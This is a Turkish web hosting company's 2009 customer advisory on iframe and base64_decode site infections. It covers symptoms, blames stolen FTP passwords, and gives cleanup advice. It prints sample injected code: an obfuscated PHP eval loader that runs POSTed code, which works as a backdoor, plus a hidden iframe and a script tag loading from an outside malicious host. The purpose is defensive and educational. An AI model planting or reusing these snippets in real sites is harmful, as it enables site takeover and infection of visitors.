Web Hosting, Domain, Reseller Web Hosting, Radio Hosting, VPS

[ÖNEMLİ] iframe ve base64_decode virüsleri hakkında bilgilendirme

18/10/2009 19:56

Son zamanlarda bu tarz saldırılarda artış görülmekle birlikte bir bilgilendirme yapmayı uygun gördük. iframe virüslerinin genel semptomları :

- Sitenize erişim sırasında haberdar olmadığınız sayfaların da çağırılması ,örnek :

http://xxxxxxx.com/cgi-bin/google13bfdfd.php ,
http://mixante .cn / in.cgi?income53

- Sitenizdeki web sayfanızı incelediğinizde özellikle : .html , .htm, .php, .asp, aspx , .js uzantılı dosyalarda haberiniz olmayan küçük kod parçacıklarının eklenmiş olması . Örnek kodlar :

Birinci Örnek Kod : " < ? php eval(base64_decode('aWYoIWlzc2V0KCRpdXRrYTEpKXtmdW5jdGlvbiBpdXRrYSgkcyl7aWYocHJlZ19tYXRjaF9hbG

woJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRl

PXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpez

JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>"

İkinci Örnek Kod : "<script src=http://ibdf-deutschland.de/cgi-bin/google13bf5f9bc4502589.php ></script>"

Üçüncü Örnek Kod : " echo "<iframe src=\"http://ibdf-deutschland.de/cgi-bin/google13bf5f9bc4502589.php " width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"

( Önemli uyarı : Sitenizde görülebilecek kodlar kesinlikle bu şekilde olacak demek değil. İncelemelerimize göre iframe virüsleri her geçen gün değişik varyantlara ayrılıyor daha farklı şekillerde görüntüleniyor. )

- Bazı eklenen kod parçacıklarının sitenizin erişimine bile engel olması.

- Google tarzı arama motorlarında sitenizin kötü amaçlı yazılımların bulunduğu belirtilerek erişiminin bloklanması.

Bu semptomlar sizin sitenizdeki sorunlara uyuyor ise sitenizde iframe virüsü bulaşmış demektir. iframe virüsleri genel olarak güvenlik zaafiyeti olan ftp erişimi yapılan kullanıcı bilgisayarlarından bulaşmaktadır. Hiç bir şekilde sunucular üzerinde bulunabilecek bir zaafiyet ile ilişkili değildir. Hiç bir şekilde sunucularımız ve verdiğimiz hizmet ile bir ilişkisi bulunmamaktadır.

Sitenize ftp üzerinden erişim yapılan bilgisayarlarda ( bu zaafiyetler bilgisayarınızda bulunan trojan ya da virüs olabilir ) bu tarz zaafiyetler var ise ftp şifreleriniz 3. şahısların eline geçiyor ve bu şifreler vasıtasıyla sitenizdeki sayfalar üzerinde değişiklikler yapılıyor. Bu değişiklikler direk kendi bilgisayarınız üzerinden bir bot sayesinde yapılıyor da olabilir , ya da ele geçirilen ftp şifrenizin ve diğer güvenlik açığına sahip sitelerin ftp bilgilerinin toplandığı bir yer üzerinden de yapılıyor olabilir.

iframe virüsüne yönelik çözüm yöntemleri nelerdir :

Sayfalarınızı bilgisayarınıza çekip eklendiğini gördüğünüz sayfalarda bu alanları temizleyin ( Şu ana kadar gördüğümüz semptomlarda web sayfalarına hiç bir zarar verilmeden bu küçük kod parçacıkları yerleştiriliyor. Bu demek değildir ki sonraki varyantlarda sayfalarınıza zarar vermeyecek. Bu yüzden müşterilerimiz çok dikkatli ve gerekli düzenlemeleri yapabilmek için çok hızlı hareket etmek zorunda )
FTP şifrenizi düzenli olarak değiştirin ( Bu makaleyi okumaya başladığınız an hemen ftp şifrenizi değiştirmenizi tavsiye ediyoruz ) . FTP şifreniz nasıl değiştirilir bununla ilgili görsel makalemize erişebilmek için tıklayın .
FTP bilgilerinizi hiç bir şekilde FTP programları içerisinde kayıt altına almayın. FTP Bilgilerinizle hiç bir şekilde güvenliğinden emin olmadığınız bilgisayarlardan bağlanmayın. FTP bilgilerinizle internet explorer , firefox tarzı browerlar üzerinden bağlantı yapmayın.
Özellikle paylaşım sitelerinden indirilen cracklı Cuteftp tarzı ftp programları aracalığı ile bu sorunu yaşayan bir çok müşteri görüyoruz. Bu tarz cracklı programları kullanmayın. Filezilla nın en son sürümünü ftp bağlantısı için öneriyoruz.
Bilgisayarınıza mutlaka gelişmiş bir antispyware-antivirüs uygulaması ile tarayın. Unutmayınız ki trojan tarzı uygulamalar eğer bilgisayarınızda aktif olarak durmaya devam ediyorsa bu sorun tekrar başınıza gelecektir.
Yapmış olduğunuz bilgisayar tarama ve temizliğe bir şekilde güvensizlik duymaya devam ediyor iseniz bilgisayarınızı formatlayıp sıfırdan kurmaya çekinmeyin ( Bu sizin için zor bir işlem gibi görünsede gelecekte web sitelerinizde yaşayacağınız sorunların ve emeklerinizin heba olmasının yanında hiç de zor değil )
Tüm bu işlemleri yaptıktan sonra google daki blok bir süre sonra kalkacaktır ya da google webmaster tools sayfası üzerinden bloğun kaldırılması için talepte bulunabilirsiniz.

Bydor Telekomünikasyon olarak biz size bu sorunda nasıl yardımcı olabiliriz :

Müşterilerimizin konu ile ilgili farkındalığının arttırılması önemli. Periyodik duyurularla bu konu hakkında tüm müşterilerimizi bilgilendiriyor olacağız. Girmiş olduğunuz bu makaleyi mümkün olduğunca güncel halde tutacağız.
Eğer web sitenizde bu sorunla yeni karşılaşıyor iseniz sizinle almış olduğumuz sunucu yedeklerini bir seferlik ücretsiz olarak paylaşabiliriz. Virüsün olmadığını düşündüğünüz bir tarihle beraber bize kontrol panelinizde bulunan ticket destek sisteminden ulaşabilirsiniz . ( Yukarıdaki çözüm adımlarından 1. ve 7. hariç hepsini uygulayıp bize ulaşmalısınız Aksi takdirde virüs tekrar sitenize bulaşacaktır. )
Sayfalarınızdan virüsün temizlenmesi işleminde sorunlar ile karşılaşıyor iseniz ve yedekler işinize yaramıyor ise sitenizdeki virüs temizleme işlemini belirli bir ücret karşılığı teknik personelimiz de yapmaya çalışacak . Bu konuda kontrol panelinizde bulunan ticket destek sisteminden ulaşarak bilgi alabilirsiniz. ( Yukarıdaki çözüm adımlarından 1. ve 7. hariç hepsini uygulayıp bize ulaşmalısınız. Aksi takdirde virüs tekrar sitenize bulaşacaktır. )

Aşağıda konuyla ilgili inceleme yapılmış ve çözüm yolları sunulmuş bazı sitelerin linkleri bulunmaktadır. Konuyla ilgili tüm müşterilerimizin bu linkleri incelemesini tavsiye ediyoruz :

Türkçe :